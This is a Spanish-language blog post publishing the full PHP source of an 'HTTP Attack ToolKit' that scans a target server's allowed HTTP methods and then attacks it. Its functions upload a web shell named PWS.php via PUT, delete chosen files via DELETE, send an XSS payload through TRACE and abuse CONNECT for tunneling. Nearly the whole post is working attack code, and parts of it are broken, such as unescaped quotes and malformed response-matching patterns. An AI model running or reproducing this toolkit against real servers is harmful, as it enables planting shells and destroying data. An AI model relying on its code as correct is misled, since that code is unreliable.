HTTP Attack ToolKit By UxMal & Inyexion (sources code)

Posted on 13:12 by Xianur0

consola.php


<h2>Consola HTTP</h2>
<form Method="POST" Action="">
<textarea name="consola" rows="20" cols="100">
<?php
if(isset($_POST["consola"]))  { $consola = $_POST["consola"];
$sock = @fsockopen($host, $puerto, &$errno, &$errstr, $TimeOut);
if(!$sock) {
    echo "Puerto $puerto Cerrado";
}else{
$head = @fputs($sock, "$consola\n\n");
while(!feof($sock) ) {
$datos .= htmlentities(fgets($sock, 4096));
}
}
echo $datos;
}
echo '</textarea>
<input type="hidden" name="puerto" value="'.$puerto.'"><input type="hidden" name="host" value="'.$host.'">
<br><input type="submit" value="OK">
</form>';
?>


index.php

<?php
include("functions.php");

formulario();
opt();
if (isset($_GET["atack"])) switch($_GET["atack"]) {
case put:
put();
break;
case trace:
trace();
break;
case delete:
include("delete.php");
break;
case consola:
include("consola.php");
break;
case connect:
connect();
break;
default:
header("Location: index.php");
break;
}

?>



functions.php

<?php

###################################### FORMULARIO ###############################
function formulario()
{
echo"<html>
<center>
<title>HTTP Attack ToolKit By UxMal & InyeXion</title>
<form method="POST" action="">
<h1>HTTP Atack ToolKit By InyeXion & UxMal</h1>
<a>Host: <input name="host" size="17" type="text" value="".htmlentities($_REQUEST["host"]).""></a><br>
<a>Puerto: <input name="puerto" size="17" type="text" value="".htmlentities($_REQUEST["puerto"]).""></a><br>
<input type="submit" value="Scannear!">
<br>
</form></html>";
}

######################################## OPCIONES #################################
function opt()
{
error_reporting(0);
set_time_limit(0);
$TimeOut = 2;

if (isset($_POST["host"]) && isset($_POST["puerto"]))
{
$host = htmlentities($_POST["host"]);

if(is_numeric($_POST["puerto"]))
{
$puerto = htmlentities($_POST["puerto"]);
}else{
print "Solo Numeros!";
exit();
}
if(!$TimeOut)
{
$sock = @fsockopen($host, $puerto);
}else{
$sock = @fsockopen($host, $puerto, &$errno, &$errstr, $TimeOut);
}
if(!$sock) {
    echo "<h2>Puerto $puerto Cerrado</h2><br>";
    exit();
}
$header=htmlentities($_GET["header"]);
$socket = @fsockopen($header, 80, &$errno, &$errstr, 10);
$head = @fputs($sock, "OPTIONS / HTTP/1.0\n\n");

while(!feof($sock) ) {
$buffer .= htmlentities(fgets($sock, 4096));
}
list($basura, $todo) = explode("Server: ", $buffer);
list($server, $basura) = explode("\n", $todo);
unset($basura, $todo);

list($basura, $todo) = explode("Allow: ", $buffer);
list($allow, $basura) = explode("\n", $todo);
unset($basura, $todo);

echo "<b>Servidor: $server</b><br>";
echo "<b>Metodos Permitidos: $allow</b><br>";

if(ereg(" PUT, ", $allow)) echo "<br><a>Se ha Detectado El Metodo PUT, desea atacar? <a href="?atack=put&host=$host&puerto=$puerto">SI</a> | <a>No</a><hr>";
if(ereg(" DELETE, ", $allow))
{
echo "<br><a>Se ha Detectado El Metodo DELETE";
echo "
<center><form action="delete.php" method="POST">
<input type="hidden" name="host" value="".$host."">
<input type="hidden" name="puerto" value="".$puerto."">
<b>Especifica el archivo a borrar: </b><input type="text" name="borrar">
<input type="submit" name="subx" value="Borrar">
</form></center><hr>";
}
if(ereg(" TRACE", $allow)) echo "<br><a>Se ha Detectado El Metodo TRACE, desea atacar? <a href="?atack=trace&host=$host&puerto=$puerto">SI</a> | <a>No</a><hr>";
if(ereg(" CONNECT, ", $allow)) echo "<br><a>Altas Posibilidades De Ataque MITM, Desea Probar Un Ataque Tunneling? <a href="?atack=connect&host=$host&puerto=$puerto">SI</a> | <a>No</a><hr>";
include("consola.php");

}
}

######################################### PUT #####################################
function put()
{
$shell = "PWS.php";
if (isset($_GET["host"]) && isset($_GET["puerto"])) {
$host = htmlentities($_GET["host"]);
if(is_numeric($_GET["puerto"]))
{
$puerto = htmlentities($_GET["puerto"]);
}
if(!$TimeOut) $sock = @fsockopen($host, $puerto); else $sock = @fsockopen($host, $puerto, &$errno, &$errstr, $TimeOut);
if(!$sock) {
    echo "<h2>Puerto $puerto Cerrado</h2><br>";
    exit();
}
$file = fopen($shell, "r");
$codigo = fread($file, filesize($shell));
fclose($file);
$lenght = strlen($codigo);
$head = @fputs($sock, "PUT /PWS.php HTTP/1.0\nHost: $host\nProxy-Connection: keep-alive\nContent-Type: multipart/form-data\nContent-Length: $lenght\nContent-Type: text/html\n\n$codigo\n\n");

while(!feof($sock) ) {
$buffer .= htmlentities(fgets($sock, 4096)); $buffer .= "<br>";
}
echo $buffer;
}
$error = "<br><br><b>Ataque Fallido, No Tenemos Permisos :(, Puedes Intentar con el header: Authorization.</b>";
$ok = "<br><br><b>Ataque Logrado :), Disfrutalo: http://$host/PWS.php</b>";

if(ereg("[HTTP/1.1 401 ]+[HTTP/1.1 301 ]+[HTTP/1.1 302 ]+[HTTP/1.1 203 ]+[HTTP/1.1 403 ]", $buffer))
{
echo $error;
}elseif(ereg("[HTTP/1.1 200 ]+[HTTP/1.1 201 ]+[HTTP/1.1 302 ]",$buffer))
{
echo $ok;
}

echo "<br><b>Posible Desborde de Buffer en Metodo PUT</b><br>";
}

######################################## TRACE ###################################
function trace()
{
$shell = "PWS.php";
if (isset($_GET["host"]) && isset($_GET["puerto"])) {
$host = htmlentities($_GET["host"]);
if(is_numeric($_GET["puerto"]))
{
$puerto = htmlentities($_GET["puerto"]);
}
if(!$TimeOut)
{
$sock = @fsockopen($host, $puerto);
}else{
$sock = @fsockopen($host, $puerto, &$errno, &$errstr, $TimeOut);
}
if(!$sock) {
    echo "<h2>Puerto $puerto Cerrado</h2><br>";
    exit();
}

$head = @fputs($sock, "TRACE / HTTP/1.0\nHost: $host\nXSS: <script>alert("XSS en TRACE")</script>\n\n");

while(!feof($sock) ) {
$buffer .= fgets($sock, 4096); $buffer .= "<br>";
}
echo $buffer;
if(ereg(""XSS en TRACE"", $buffer)) echo "<br><br><b>Vulnerable a XSS :)</b><br>";
if(ereg("TRACE / HTTP/1.0", $buffer)) echo "<br><b>Posibilidad de Ataques DoS, Mediante Consumo de Banda :)</b><br>";
}
}

#################################### CONNECT ################################
function connect()
{
if(isset($_GET["host"]) && isset($_GET["puerto"])) {
$host = htmlentities($_GET["host"]);
if(is_numeric($_GET["puerto"])) $puerto = $_GET["puerto"];
if(!$TimeOut)
{
$sock = @fsockopen($host, $puerto);
}else{
$sock = @fsockopen($host, $puerto, &$errno, &$errstr, $TimeOut);
}
if(!$sock) {
    echo "<h2>Puerto $puerto Cerrado</h2><br>";
    exit();
}

$head = @fputs($sock, "CONNECT www.google.com:80 HTTP/1.0\nHost: $host\nProxy-Connection: keep-alive\n\n");

while(!feof($sock) ) {
$buffer .= htmlentities(fgets($sock, 4096)); $buffer .= "<br>";
}
echo $buffer;
}
$error = "<br><br><b>Ataque Tuneling Fallido.</b>";
$ok = "<br><br><b>Ataque Tunneling Correcto :)</b>";

if(ereg("[HTTP/1.1 400 ]+[HTTP/1.1 405 ]+[HTTP/1.1 401 ]+[HTTP/1.1 301 ]+[HTTP/1.1 302 ]+[HTTP/1.1 302 ]+[HTTP/1.1 203 ]", $buffer))
{
echo $error;
}elseif(ereg("[HTTP/1.1 200 ]+[HTTP/1.1 201 ]",$buffer))
{
echo $ok;
}
}

delete.php

<?php
include("functions.php");
formulario();
opt();
if (isset($_POST["host"]) and isset($_POST["puerto"]) and isset($_POST["subx"])) {
$borrar = $_POST["borrar"];
$host = htmlentities($_GET["host"]);
if(is_numeric($_GET["puerto"]))
{
$puerto = $_GET["puerto"];
}
if(!$TimeOut)
{
$sock = @fsockopen($host, $puerto);
}else{
$sock = @fsockopen($host, $puerto, &$errno, &$errstr, $TimeOut);
}
if(!$sock) {
    echo "<h2>Puerto $puerto Cerrado</h2><br>";
    exit();
}
$head = @fputs($sock, "DELETE /$borrar HTTP/1.0\nHost: $host\nProxy-Connection: keep-alive\n\n");
$buffer = "";
while(!feof($sock) ) {
$buffer .= htmlentities(fgets($sock, 4096)); $buffer .= "<br>";
}
echo $buffer;
}
$error = "<br><br><b>Ataque Fallido, No Tenemos Permisos :(, Puedes Intentar con el header: Authorization.</b>";
$ok = "<br><br><b>Ataque Logrado :)</b>";

if(ereg("[HTTP/1.1 401 ]+[HTTP/1.1 301 ]+[HTTP/1.1 302 ]+[HTTP/1.1 203 ]", $buffer))
{
echo $error;
}elseif(ereg("[HTTP/1.1 200 ]+[HTTP/1.1 201 ]+[HTTP/1.1 302 ]",$buffer))
{
echo $ok;
}
?>

0 comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)